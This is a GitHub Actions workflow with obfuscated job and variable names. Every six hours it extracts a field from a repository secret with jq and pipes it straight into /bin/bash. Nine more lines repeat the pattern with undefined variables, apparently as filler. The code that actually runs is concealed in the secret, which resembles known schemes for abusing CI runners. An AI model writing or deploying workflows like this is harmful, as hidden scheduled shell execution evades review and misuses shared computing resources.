name: mazhengfu4567
on:
  workflow_dispatch:
  schedule:
    - cron: '25 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mazhengfu4567
        env:
          fjrp601: ${{ secrets.fjrp601 }}
        run: |
          echo $fjrp601 | jq -r .i82 | /bin/bash
          echo $er1 | jq -r .fojsk86 | /bin/bash
          echo $vs70104 | jq -r .opz2 | /bin/bash
          echo $huh338 | jq -r .pipkl990 | /bin/bash
          echo $t571 | jq -r .kbdep06643 | /bin/bash
          echo $qcd951 | jq -r .p29474 | /bin/bash
          echo $d93189 | jq -r .dnsg51927 | /bin/bash
          echo $emxn34995 | jq -r .fo16 | /bin/bash
          echo $gpi4102 | jq -r .c4 | /bin/bash
          echo $duguh43 | jq -r .ifl55984 | /bin/bash

